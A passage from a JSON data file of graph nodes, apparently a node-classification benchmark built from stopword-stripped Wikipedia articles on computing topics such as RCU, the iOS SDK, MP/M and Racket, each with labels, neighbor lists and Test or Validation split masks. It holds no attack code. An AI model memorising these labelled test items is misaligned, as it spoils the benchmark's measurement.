system performance much higher complete access extended memory",
    "neighbors": [
      641,
      6148,
      10757,
      6921,
      6797,
      5397,
      2345,
      7849,
      11562,
      7983,
      5694,
      576,
      7364,
      9166,
      2383,
      5840,
      5612,
      8301,
      1007,
      5619,
      8959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7987,
    "label": 8,
    "text": "Vibe.d:vibe.d vibe.d open-source software web framework asynchronous i/o toolkit written programming language vibe.d deal requests per second common platforms",
    "neighbors": [
      1920,
      3462,
      8582,
      2062,
      9614,
      2576,
      148,
      1812,
      6941,
      9245,
      10526,
      8739,
      3876,
      4777,
      5165,
      7983,
      4529,
      8883,
      692,
      5048,
      6074,
      190,
      9666,
      8644,
      1353,
      595,
      84,
      4056,
      6493,
      102,
      8554,
      5612,
      8691,
      3705,
      11259
    ],
    "mask": "Test"
  },
  {
    "node_id": 7988,
    "label": 3,
    "text": "Scorpion_(CPU):scorpion cpu scorpion central processing unit cpu core designed qualcomm use snapdragon mobile systems chips socs released 2008 designed in-house many architectural similarities arm cortex-a8 cortex-a9 cpu cores",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      196,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      2862,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7989,
    "label": 4,
    "text": "List_of_security_assessment_tools:list security assessment tools list available software hardware tools designed particularly suited various kinds security assessment security testing several operating systems tool suites provide bundles tools useful various types security assessment",
    "neighbors": [
      9440,
      2084,
      4580,
      10718,
      842,
      2671,
      1232,
      3887,
      11191,
      2739,
      1429,
      4373,
      8119,
      7228,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7990,
    "label": 4,
    "text": "Kristina_Svechinskaya:kristina svechinskaya kristina vladimirovna svechinskaya born february 16 1989 former russian money mule hacker studying new york university 2010 accused plot defraud british u.s. banks usage false passports according charges svechinskaya used zeus trojan horse attack thousands bank accounts opened least five accounts bank america wachovia received 35,000 £22,000 stolen money estimated nine people svechinskaya skimmed 3 million total svechinskaya dubbed media world sexiest computer hacker raunchy casual appearance compared anna chapman upcoming russian film botnet partially based svechinskaya story fluent english svechinskaya originally studied stavropol state university according svechinskaya mother death kristina father family living 12,000 ruble us 400 time salary third year kristina chose work travel program summer 2010 arrived massachusetts started work fast food outlet earnings small moved new york worked hacker money mule svechinskaya offered 8–10 share taken money sentence expected announced june 2011 svechinskaya signed personal recognizance bond released 25,000 bail case conviction svechinskaya could imprisoned 40 years would included fraud charge 30 years 1 million fine false passports charge 10 years 250,000 fine 2016 svechinskaya made youtube presentation smartflash marketed secure cloud-based usb flash drive store unlimited amount data",
    "neighbors": [
      10297,
      4194,
      4956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7991,
    "label": 2,
    "text": "IOS_SDK:ios sdk ios sdk software development kit formerly iphone sdk software development kit developed apple inc kit allows development mobile apps apple ios operating system originally developing iphone prior unveiling 2007 apple then-ceo steve jobs intend let third-party developers build native apps ios instead directing make web applications safari web browser however backlash developers prompted company reconsider jobs announcing october 2007 apple would software development kit available developers february 2008 sdk released march 6 2008 sdk free download users mac personal computers available microsoft windows pcs sdk contains sets giving developers access various functions services ios devices hardware software attributes also contains iphone simulator mimic look feel device computer developing new versions sdk accompany new versions ios order test applications get technical support distribute apps app store developers required subscribe apple developer program combined xcode ios sdk helps developers write ios apps using officially supported programming languages including swift objective-c. companies also created tools allow development native ios apps using respective programming languages originally developing iphone prior unveiling 2007 apple then-ceo steve jobs intend let third-party developers build native apps ios operating system instead directing make web applications safari web browser however backlash developers prompted company reconsider jobs announcing october 17 2007 apple would software development kit sdk available developers february 2008 sdk released march 6 2008 ios sdk free download mac users available microsoft windows personal computers test application get technical support distribute applications app store developers required subscribe apple developer program sdk contents separated following sets sdk also contains iphone simulator program used simulate look feel iphone developer computer new sdk versions accompany new ios versions ios sdk combined xcode helps developers write ios applications using officially supported programming languages including swift objective-c. .ipa ios app store package file ios application archive file stores ios app 2008 sun microsystems announced plans release java virtual machine jvm ios based java platform micro edition version java would enable java applications run iphone ipod touch soon announcement developers familiar sdk terms agreement believed allowing third-party applications run background answer phone call still run application example allowing application download code another source allowing application interact third-party application sun development efforts could hindered without apple cooperation sun also worked third-party company called innaworks attempts get java iphone despite apparent lack interest apple firmware leak 2007 iphone release revealed arm chip processor jazelle support embedded java execution novell announced september 2009 successfully developed monotouch software framework let developers write native iphone applications c .net programming languages still maintaining compatibility apple requirements xamarin.ios visual studio tools xamarin open-source app development platform lets build apps many operating systems single shared .net code base xamarin allows write apps take full advantage power features performance platform xamarin.ios one xamarin frameworks use create fully native ios apps using c visual studio ios support adobe flash although adobe two versions software – flash flash lite – apple views neither suitable iphone claiming full flash slow useful flash lite capable used web october 2009 adobe announced upcoming update creative suite would feature component let developers build native iphone apps using company flash development tools software officially released part company creative suite 5 collection professional applications april 2010 apple made controversial changes iphone developer agreement requiring developers use approved programming languages order publish apps app store banning applications used third-party development tools developer backlash news potential antitrust investigation apple revised agreement september allowing use third-party development tools",
    "neighbors": [
      10755,
      9732,
      11271,
      4111,
      5647,
      7697,
      4114,
      11289,
      9762,
      3626,
      4139,
      6186,
      6700,
      7727,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      7246,
      8783,
      4180,
      7253,
      10838,
      1623,
      3672,
      3162,
      9308,
      607,
      3167,
      3681,
      2658,
      9826,
      8806,
      3691,
      6763,
      8303,
      2673,
      2676,
      4219,
      7292,
      8315,
      2686,
      6783,
      8316,
      8829,
      10878,
      11391,
      7307,
      6797,
      5784,
      1177,
      3228,
      6301,
      2207,
      11430,
      3241,
      171,
      10924,
      2735,
      3248,
      7857,
      4283,
      3772,
      7869,
      4305,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      10470,
      8423,
      6377,
      2282,
      9451,
      1772,
      9964,
      10478,
      8441,
      11513,
      7420,
      1290,
      3338,
      4364,
      784,
      10512,
      4888,
      5912,
      4383,
      10023,
      4399,
      7983,
      2363,
      2365,
      2366,
      9022,
      2368,
      1346,
      10562,
      7492,
      10052,
      7496,
      4957,
      6495,
      10080,
      9063,
      10599,
      3948,
      2925,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      11171,
      5546,
      8109,
      2492,
      446,
      7614,
      9665,
      2502,
      456,
      1482,
      7118,
      464,
      3542,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      3561,
      10215,
      495,
      7154,
      5619,
      3573,
      11257,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7992,
    "label": 2,
    "text": "Read-copy-update:read-copy-update computer science read-copy-update rcu synchronization mechanism based mutual exclusion used performance reads crucial example space–time tradeoff enabling fast operations cost space read-copy-update allows multiple threads efficiently read shared memory deferring updates pre-existing reads later time simultaneously marking data ensuring new readers read updated data makes readers proceed synchronization involved hence fast also making updates difficult key property rcu readers access data structure even process updated rcu updaters block readers force retry accesses overview starts showing data safely inserted deleted linked structures despite concurrent readers first diagram right depicts four-state insertion procedure time advancing left right first state shows global pointer named initially colored red indicate might accessed reader time thus requiring updaters take care allocating memory new structure transitions second state structure indeterminate state indicated question marks inaccessible readers indicated green color structure inaccessible readers updater may carry desired operation without fear disrupting concurrent readers initializing new structure transitions third state shows initialized values structure fields assigning reference new structure transitions fourth final state state structure accessible readers therefore colored red primitive used carry assignment ensures assignment atomic sense concurrent readers either see pointer valid pointer new structure mash-up two values additional properties described later article procedure demonstrates new data may inserted linked data structure even though readers concurrently traversing data structure insertion second diagram right depicts four-state deletion procedure time advancing left right first state shows linked list containing elements three elements colored red indicate rcu reader might reference time using remove element list transitions second state note link element b c left intact order allow readers currently referencing element traverse remainder list readers accessing link element either obtain reference element element either way reader see valid correctly formatted linked list element colored yellow indicate pre-existing readers might still reference element new readers way obtain reference wait-for-readers operation transitions third state note wait-for-readers operation need wait pre-existing readers new readers element colored green indicate readers longer referencing therefore safe updater free element thus transitioning fourth final state important reiterate second state different readers see two different versions list either without element words rcu provides coordination space different versions list well time different states deletion procedures stark contrast traditional synchronization primitives locking transactions coordinate time space procedure demonstrates old data may removed linked data structure even though readers concurrently traversing data structure deletion given insertion deletion wide variety data structures implemented using rcu rcu readers execute within read-side critical sections normally delimited statement within rcu read-side critical section said quiescent state statements permitted hold references rcu-protected data structures wait-for-readers operation required wait threads quiescent states time period thread resides least quiescent state called grace period definition rcu read-side critical section existence beginning given grace period must complete end grace period constitutes fundamental guarantee provided rcu addition wait-for-readers operation must wait least one grace period elapse turns guarantee provided extremely small read-side overheads fact limiting case actually realized server-class linux-kernel builds read-side overhead exactly zero rcu fundamental guarantee may used splitting updates removal reclamation phases removal phase removes references data items within data structure possibly replacing references new versions data items run concurrently rcu read-side critical sections reason safe run removal phase concurrently rcu readers semantics modern cpus guarantee readers see either old new version data structure rather partially updated reference grace period elapsed longer readers referencing old version safe reclamation phase free reclaim data items made old version splitting update removal reclamation phases allows updater perform removal phase immediately defer reclamation phase readers active removal phase completed words grace period elapsed typical rcu update sequence goes something like following procedure matches earlier diagram updater performing removal reclamation step often helpful entirely different thread reclamation reference counting used let reader perform removal even thread performs update step step 2 reclamation step step 4 often helpful think separately early 2008 almost 2,000 uses rcu api within linux kernel including networking protocol stacks memory-management system 9,000 uses since 2006 researchers applied rcu similar techniques number problems including management metadata used dynamic analysis managing lifetime clustered objects managing object lifetime k42 research operating system optimizing software transactional memory implementations dragonfly bsd uses technique similar rcu closely resembles linux sleepable rcu srcu implementation ability wait readers done allows rcu readers use much lighter-weight synchronization—in cases absolutely synchronization contrast conventional lock-based schemes readers must use heavy-weight synchronization order prevent updater deleting data structure reason lock-based updaters typically update data place must therefore exclude readers contrast rcu-based updaters typically take advantage fact writes single aligned pointers atomic modern cpus allowing atomic insertion removal replacement data linked structure without disrupting readers concurrent rcu readers continue accessing old versions dispense atomic read-modify-write instructions memory barriers cache misses expensive modern smp computer systems even absence lock contention lightweight nature rcu read-side primitives provides additional advantages beyond excellent performance scalability real-time response example provide immunity deadlock livelock conditions course rcu also disadvantages example rcu specialized technique works best situations mostly reads updates often less applicable update-only workloads another example although fact rcu readers updaters may execute concurrently enables lightweight nature rcu read-side primitives algorithms may amenable read/update concurrency despite well decade experience rcu exact extent applicability still research topic technique covered u.s. software patent 5,442,758 issued august 15 1995 assigned sequent computer systems well 5,608,893 expired 2009-03-30 5,727,209 expired 2010-04-05 6,219,690 expired 2009-05-18 6,886,162 expired 2009-05-25 now-expired us patent 4,809,168 covers closely related technique rcu also topic one claim sco v. ibm lawsuit rcu available number operating systems added linux kernel october 2002 user-level implementations liburcu also available implementation rcu version 2.6 linux kernel among better-known rcu implementations used inspiration rcu api remainder article core api application programming interface quite small diagram right shows api communicates among reader updater reclaimer rcu infrastructure observes time sequence codice_9 codice_10 codice_1 codice_4 invocations order determine 1 codice_1 invocations may return callers 2 codice_4 callbacks may invoked efficient implementations rcu infrastructure make heavy use batching order amortize overhead many uses corresponding apis rcu extremely simple toy implementations aid understanding rcu section presents one toy implementation works non-preemptive environment void call_rcu void *callback void void *arg void synchronize_rcu void code sample codice_7 codice_5 ignored without missing much however needed order suppress harmful compiler optimization prevent cpus reordering accesses smp_wmb /* order previous writes */ typeof p _value access_once p note codice_9 codice_10 nothing great strength classic rcu non-preemptive kernel read-side overhead precisely zero codice_19 empty macro dec alpha cpus memory barriers needed modern cpus codice_20 macro volatile cast generates additional code cases way codice_9 participate deadlock cycle cause realtime process miss scheduling deadline precipitate priority inversion result high lock contention however toy rcu implementation blocking within rcu read-side critical section illegal blocking holding pure spinlock implementation codice_1 moves caller synchronize_cpu cpu thus blocking cpus able perform context switch recall non-preemptive environment blocking within rcu read-side critical section illegal imply preemption points within rcu read-side critical section therefore given cpu executes context switch schedule another process know cpu must completed preceding rcu read-side critical sections cpus executed context switch preceding rcu read-side critical sections completed although rcu used many different ways common use rcu analogous reader-writer locking following side-by-side code display shows closely related reader-writer locking rcu differences two approaches quite small read-side locking moves codice_9 codice_10 update-side locking moves reader-writer lock simple spinlock codice_1 precedes codice_26 however one potential catch read-side update-side critical sections run concurrently many cases problem necessary check carefully regardless example multiple independent list updates must seen single atomic update converting rcu require special care also presence codice_1 means rcu version codice_28 block problem codice_4 could used like codice_30 place codice_1 especially useful combination reference counting name comes way rcu used update linked structure place thread wishing uses following steps thread made copy awakened kernel safely deallocate old structure structure read concurrently thread copying order update hence name read-copy update abbreviation rcu one many contributions linux community names similar techniques include passive serialization mp defer vm/xa programmers generations k42 tornado programmers techniques mechanisms resembling rcu independently invented multiple times bauer r.t. june 2009 operational verification relativistic program psu tech report tr-09-04 http //www.pdx.edu/sites/www.pdx.edu.computer-science/files/tr0904.pdf",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      3142,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      2304,
      4360,
      5384,
      1291,
      4367,
      7446,
      792,
      7451,
      10016,
      295,
      6968,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      11608,
      1382,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7993,
    "label": 8,
    "text": "Pimp_My_Search:pimp search pimp search novelty website create google lookalike webpage replacing word google word phrase user choice non-commercial website connected google inc. pimp search started 2006 became popular 2008 featured many media websites youtube videos site closed later 2009 citing dispute 'trademark issues february 2009 pimp search ended google search facilities posted message read trademark issues google longer allowing searches us ... currently site remains closed following message displayed trademark issues pimp search closed ever linking another website shinysearch.com",
    "neighbors": [
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7994,
    "label": 4,
    "text": "Password_fatigue:password fatigue password fatigue feeling experienced many people required remember excessive number passwords part daily routine logon computer work undo bicycle lock conduct banking automated teller machine atm concept also known password chaos broadly identity chaos increasing prominence information technology internet employment finance recreation aspects people lives ensuing introduction secure transaction technology led people accumulating proliferation accounts passwords according 2002 survey british online-security consultant nta monitor typical intensive computer user 21 accounts require password factors causing password fatigue aside contributing stress password fatigue may encourage people adopt habits reduce security protected information example account holder might use password several different accounts deliberately choose easy-to-remember passwords vulnerable cracking rely written records passwords many sites attempt prevent users choosing easy-to-guess passwords add restrictions password length composition contribute password fatigue many cases restrictions placed passwords actually serve decrease security account either preventing good passwords making password complex user ends storing insecurely post-it note sites also block non-ascii non-alphanumeric characters password fatigue typically affect users also affect technical departments manage user accounts constantly reinitializing passwords situation ends lowering morale cases many cases users end typing passwords cleartext text files remember even writing post-it notes stick desk drawer companies well organized respect implemented alternative authentication methods adopted technologies user credentials entered automatically others may focus ease use even worsen situation constantly implementing new applications authentication system",
    "neighbors": [
      3521,
      9313,
      6916,
      6797,
      5108,
      1557,
      3382,
      5435
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7995,
    "label": 0,
    "text": "Language_Grid:language grid language grid multilingual service platform internet mainly supporting intercultural collaboration enables easy registration sharing language resources online dictionaries bilingual corpora machine translations language grid developed increase accessibility usability language resources takes service-oriented approach wrapping existing language resources atomic web services enables users compose new services combining atomic web services architecture language grid increase usability language resources decrease risk providers opening resources wrapping resources services providers control intellectual property rights essential define stakeholders roles social protocol among every stakeholder related service grids service grid user take one roles following three categories institutional agreement reflects intentions three roles service grid users service providers ’ point view protection intellectual property rights critical satisfy demands service usage classified following three categories even for-profit organizations social responsibility activities classified non-profit use activities often conducted public institutions non-profit organizations conversely activities public institutions non-profit organizations commercial profit classified for-profit use language grid consists four service layers p2p service grid layer atomic service layer composite service layer application system layer p2p service grid layer constructed service grid server software main components service supervisor grid composer service supervisor controls service invocations according access control policies registered service providers service consumers invoke services composite service container atomic service container verifies whether request satisfies providers access control policies hand grid composer coordinates distributed service grids operated different grid operators order connect regional language services service grid server software developed language grid project national institute information communications technology development started 2006 april 2010 open-sourced software maintained open source project software used build language grid also employed lapps grid funded nsf department social informatics kyoto university started single operation language grid december 2007 non-profit purpose research purpose named language grid kyoto operation center january 2011 second operation center language grid started national electronics computer technology center thailand called language grid bangkok operation center later language grid jakarta operation center indonesia language grid xinjiang operation china started 2012 2014 respectively four operation centers connected realize federated operation language grid enables sharing language services among multiple language grids may 2017 operation kyoto language grid moved kyoto university npo language grid association may 2018 183 groups 24 countries regions joined kyoto language grid 226 services shared federated language grid researches developing using language grid cover several areas including artificial intelligence services computing human-computer interaction since 2006 research funds language grid provided national institute information communications technology japan society promotion science strategic information communications r promotion programme ministry internal affairs communications japan research institute science technology society japan science technology agency november 2015 research collaboration federated grid language services started among language grid european language resources association linguistic data consortium using language services different ways based language grid activities conducted different communities 2006 language grid association formed among industry government academia citizens advance technologies applications language grid foreigners fall ill different countries may unable receive adequate medical attention inability communicate japanese medical doctors multilingual medical communication support system developed wakayama university cooperation kyoto center multicultural society npo dispatched volunteer interpreters several affiliated hospitals total 1700 times per year support system helps communication foreign outpatients medical staff hospital reception desks using system hospital staff ask outpatients symptoms provide guidance around section hospital npo pangaea universities japan vietnam worked agricultural support project two major goals low rice productivity environmental burdens caused excessive use agrichemicals 2011 2014 four-month experiment conducted year vinh long province located mekong delta goal provide timely appropriate agriculture knowledge rice harvesting vietnamese farmers japanese experts since japanese experts physically travel rural areas highly motivated use language grid however low literacy rate areas farmers difficulties using computers reading writing messages youth-mediated communication ymc model invented children act mediators bridge gaps language knowledge cultures experts farmers",
    "neighbors": [
      7164,
      7599
    ],
    "mask": "None"
  },
  {
    "node_id": 7996,
    "label": 4,
    "text": "Donbot_botnet:donbot botnet donbot also known aliases buzus bachsoy botnet mostly involved sending pharmaceutical stock-based e-mail spam donbot botnet thought consist roughly 125,000 individual computers combined send 800 million spam messages day amount equals 1.3 estimated total global spam volume 230 billion messages day though botnet known spikes accounted 4 total spam volume",
    "neighbors": [
      3072,
      10756,
      3724,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      5886,
      10297,
      3643,
      7739,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      1400,
      2041,
      10875,
      3581,
      2558,
      9087
    ],
    "mask": "None"
  },
  {
    "node_id": 7997,
    "label": 3,
    "text": "FCMOV:fcmov fcmov floating point conditional move opcode intel x86 architecture first introduced pentium pro processors copies contents one floating point stack register depending contents eflags integer flag register st 0 top stack register 8 variants instruction selected condition codes need set instruction perform move similar cmov instruction fcmov allows conditional operations performed without usual branching overhead however higher latency conditional branch instructions therefore useful simple yet unpredictable comparison conditional operations provide substantial performance gains instruction usually used fcomi instruction fcom-fstsw-sahf idiom set relevant condition codes based result floating point comparison table shows variants fcmov instructions first operand always st register equivalently top floating point stack opcode column indicates two-byte sequence second byte base value indicating number floating point stack register use second operand add desired number complete corresponding opcode value",
    "neighbors": [
      11107,
      936,
      6924,
      4237,
      10796,
      5234,
      499,
      372,
      1915
    ],
    "mask": "None"
  },
  {
    "node_id": 7998,
    "label": 2,
    "text": "Shared_graphics_memory:shared graphics memory computer architecture shared graphics memory refers design graphics chip dedicated memory instead shares main system ram cpu components design used many integrated graphics solutions reduce cost complexity motherboard design additional memory chips required board usually mechanism via bios jumper setting select amount system memory use graphics means graphics system tailored use much ram actually required leaving rest free applications side effect ram allocated graphics becomes effectively unavailable anything else example computer 512 mib ram set 64 mib graphics ram appear operating system user 448 mib ram installed disadvantage design lower performance system ram usually runs slower dedicated graphics ram contention memory bus shared rest system may also cause performance issues rest system designed fact mind ram 'taken away graphics similar approach gave similar results boost graphics used sgi computers notably o2/o2+ memory machines simply one fast pool 2.1 gb per second 1996 shared system graphics sharing performed demand including pointer redirection communication main system graphics subsystem called unified memory architecture uma early personal computers used shared memory design graphics hardware sharing memory cpu designs saved money single bank dram could used display program examples include apple ii computer commodore 64 radio shack color computer atari st apple macintosh notable exception ibm pc graphics display facilitated use expansion card memory plugged isa slot first ibm pc use sma ibm pcjr released 1984 video memory shared first 128kib ram exact size video memory could reconfigured software meet needs current program early hybrid system commodore amiga could run shared memory system would load executable code preferentially non-shared fast ram available",
    "neighbors": [
      9741,
      2838,
      2594,
      6818,
      10658,
      9126,
      7983,
      8514,
      10051,
      9932,
      1614,
      344,
      11487,
      6495,
      1387,
      1515,
      7151,
      1776,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 7999,
    "label": 2,
    "text": "MP/M:mp/m mp/m multi-programming monitor control program discontinued multi-user version cp/m operating system created digital research developer tom rolander 1979 allowed multiple users connect single computer using separate terminal mp/m fairly advanced operating system era least microcomputers included priority-scheduled multitasking kernel name used kernel referred nucleus memory protection concurrent input/output xios support spooling queueing also allowed user run multiple programs switch system required 8080 z80 cpu minimum 32 kb ram run left little memory user applications order support reasonable setups mp/m allowed memory switched machine real memory area instance program might loaded bank ram addressable cpu time program run bank ram would switched appear low memory typically lower 32 48 kb thus become visible os technique known bank switching subsequently added single user version cp/m version 3.0 one primary uses mp/m perhaps surprise dri power user version cp/m single user ability run several programs time address large amounts memory made system worth extra price mp/m ii 2.0 added file sharing capabilities 1981 mp/m ii 2.1 came extended file locking january 1982 versions like cp/m mp/m eventually ported intel 8086 appeared mp/m-86 2.0 september 1981 main developers system include frank holsworth later director marketing digital research known revisions mp/m-86 2.0 dated 25 september 1981 5 october 1981 also mp/m-86 2.1 dated 20 july 1982 mp/m-86 2.x absorbed technology cp/m-86 1.1 bdos 2.2 become concurrent cp/m-86 3.0 bdos 3.0 1982/1983 december 1983 dos emulator named pc-mode became available optional module concurrent cp/m-86 3.1 bdos 3.1 shipping 21 february 1984 system developed ms-dos compatible concurrent dos bdos 3.1 higher turn continued evolve flexos multiuser dos still use industrial applications following list commands supported mp/m ii console command processor early 1980s digital research also developed networking software named cp/net used connect mp/m server multiple cp/net clients named requesters running cp/m originally developed tom rolander mp/net mp/m system networking allowing mp/m system function requester server cp/m requesters cp/net clients could also run diskless configuration system stored rom named cp/nos nos network operating system similar mp/nos contained mp/m without local disk facilities like cp/nos mp/nos performed disk functions network system allowed share files printers send electronic messages cp/net existed versions 1.0 1.1 1.2 version 8080 z80 processors cp/net-86 8086 available well later incarnations dr net flexnet caldera permitted redistribution modification original digital research files including source code related cp/m mp/m families tim olmstead unofficial cp/m web site since 1997 olmstead death 12 september 2001 free distribution license refreshed expanded lineo meanwhile become owner digital research assets 19 october 2001",
    "neighbors": [
      6675,
      7187,
      7188,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      6207,
      576,
      10333,
      97,
      5220,
      9320,
      8298,
      8301,
      2672,
      9329,
      7285,
      9335,
      4727,
      2168,
      6778,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      3216,
      9366,
      6296,
      2201,
      7325,
      9887,
      2729,
      7849,
      3248,
      178,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      2786,
      1253,
      1776,
      4337,
      5363,
      11513,
      2811,
      10499,
      6921,
      1804,
      273,
      11539,
      2840,
      10016,
      2345,
      11562,
      1324,
      7983,
      823,
      4409,
      7483,
      7999,
      11075,
      4423,
      5457,
      11601,
      10067,
      9563,
      10590,
      2399,
      10083,
      8551,
      5492,
      10113,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      6075,
      6078,
      9151,
      4548,
      8136,
      9166,
      3056,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 8000,
    "label": 9,
    "text": "Racket_features:racket features racket active development vehicle programming language research since mid-1990s accumulated many features years article describes demonstrates features note one racket main design goals accommodate creating new languages domain-specific languages completely new languages therefore following examples different languages implemented racket please refer main article information core racket implementation highly flexible even without using dialects function full-featured scripting language capable running without windows-native gui capable tasks web server creation graphics racket use three different garbage collectors like implementations scheme family racket implements full tail call elimination racket takes language made fully safe-for-space via live variable analysis complements precise garbage collector cases like implementation lazy racket two features crucial proper execution addition additional compiler optimizations lambda lifting just-in-time compilation racket system interface includes asynchronous non-blocking i/o green threads synchronization channels semaphores sub-processes tcp sockets following program starts echo server port 12345 combination dynamic compilation rich system interface makes racket capable scripting language similar perl python following example demonstrates walking directory tree starting current directory uses codice_1 function construct sequence walks tree codice_2 form binds codice_3 path sequence codice_4 tests paths given regexp pattern next example uses hash table record previously seen lines print unique ones programs run drracket command line via codice_5 executable racket ignores initial shebang line making possible turn programs executable scripts following script demonstrates addition using racket library command-line argument parsing script grep-like utility expecting three command-line arguments base directory filename extension perl-compatible regular expression scans base directory files given suffix print lines matching regexp pattern racket features concept custodian kind value acts resource manager often used network servers connection dealt new custodian making easy clean-up resources might left open handler e.g. open ports following extends echo server example custodian use custodians combined memory accounting feature 3m garbage collector number additional runtime parameters control additional aspects runtime make possible create completely safe sandboxed execution contexts codice_6 library provides kind functionality simple way following example creates repl server specified port connecting port look like plain racket repl except evaluation subject various protection aspects sandbox example possible access filesystem repl create network connection run subprocesses use much time memory fact repl safe enough given publicly next example implements web server using codice_7 language time connection made server codice_8 function called get html send back client racket also includes functions would need write scrapers robots example following function would list google results search string library also includes support protocols http graphic capabilities come several different flavors intended different audiences codice_9 library provides convenient functions constructing images library mainly used students htdp-based courses following example codice_10 function defined called time generate sierpinski triangle depth 8 drracket editors contain images drracket displays image values like type value integers lists running program example actually displays sierpinski triangle cut pasted another program codice_11 library constructs image values mature audiences needs example following program plots sum two formula_1 three-dimensional gaussians concentric partially transparent surfaces codice_12 function requires three-argument function first argument curried codice_13 supplies besides constructing image values codice_11 also write files png pdf postscript svg formats racket implements portable gui layer libraries mentioned build implemented via native windows api via cocoa mac os x via gtk+ linux others racket api class-based toolkit somewhat related wxwidgets used originally following simple guessing game demonstrates coding gui toolkit codice_15 class implements top-level window codice_16 implements button codice_17 function defined produces function used button callback action gui hand-coded way help gui designer program available planet slide-based presentations also developed racket using codice_18 language much like beamer racket programmatic facilities elements slides pictures combined example following program displays full-screen title slide followed slide pictures codice_19 codice_20 functions combine pictures vertically horizontally respectively centered axis extension packages also exist planet example include latex elements racket features foreign function interface based libffi interface allows writing unsafe low-level c-like code allocate memory dereference pointers call functions shared libraries send callbacks racket functions using libffi closures core implementation thin layer atop libffi written c full interface implemented via racket code interface uses macros extensively resulting expressive racket-based interface description language language number useful features uniform representation higher-order functions avoiding pitfalls callbacks callouts different struct definitions similar plain racket structs custom function types represent input output pointers implicit arguments e.g. argument provides number elements vector passed another argument using interface access underlying gui toolkits racket implements gui layer completely racket ffi used number different ways writing complete glue layer library done racket opengl binding quickly pulling single foreign function example latter approach racket notable feature ability build new domain-specific general-purpose languages result combining number important features module system plays important role combining features making possible write code spans across number modules written different language languages used extensively racket distribution user libraries fact creating new language straightforward languages less handful uses racket comes number useful languages different racket default language scribble racket documentation system comes form number languages used write prose used racket documentation well writing books articles actually rather single scribble language family similar dialects different purpose run following example copy drracket click one two scribble rendering buttons appear pdf rendering requires pdftex alternatively use codice_21 executable file striking feature scribble languages use new syntax designed specifically textually rich code syntax allows free-form text string interpolation customizable quotations useful applications preprocessing text generating text html template systems note syntax extends plain s-expressions implemented alternative input expressions typed racket statically typed variant racket type system implements unique motivation developing accommodating much idiomatic racket code possible—as result includes subtypes unions much another goal typed racket allow migration parts program typed language accommodates calling typed code untyped code vice versa generating dynamic contracts enforce type invariants considered desirable feature application lifetime stages matures script application static typing helps maintenance large body code codice_22 language language lazy evaluation semantics similar haskell following example codice_23 infinite list whose 1000th element computed value needed printout racket comes three logic programming languages racklog prolog-like language datalog implementation minikanren port unlike scribble syntax first two languages use completely new syntax rather extension s-expressions use drracket 'll see provides proper highlighting usual host tools check syntax prolog/datalog repl plt group develops racket traditionally involved education levels one earliest research ideas group promoted use language levels restrict new students providing helpful error messages fit student level knowledge approach heavily used design programs textbook several plt developers authored well programbydesign project following program uses codice_24—the beginning student language uses codice_9 library creating pictures teaching languages codice_26 library interactive animations racket comes complete implementation algol 60 language another supported language plai like racket typed untyped modules written plai export every definition unlike scheme typed plai language differs traditional racket importantly statically typed also gives useful new constructs define-type type-case test finally following example implementation new language language code stored codice_28 file use follows",
    "neighbors": [
      2304,
      8582,
      5896,
      6536,
      8973,
      5008,
      8609,
      3876,
      10924,
      8628,
      9926,
      4423,
      1610,
      5585,
      727,
      10584,
      225,
      10465,
      10083,
      8421,
      2666,
      8303,
      11632
    ],
    "mask": "Test"
  },
  {
    "node_id": 8001,
    "label": 2,
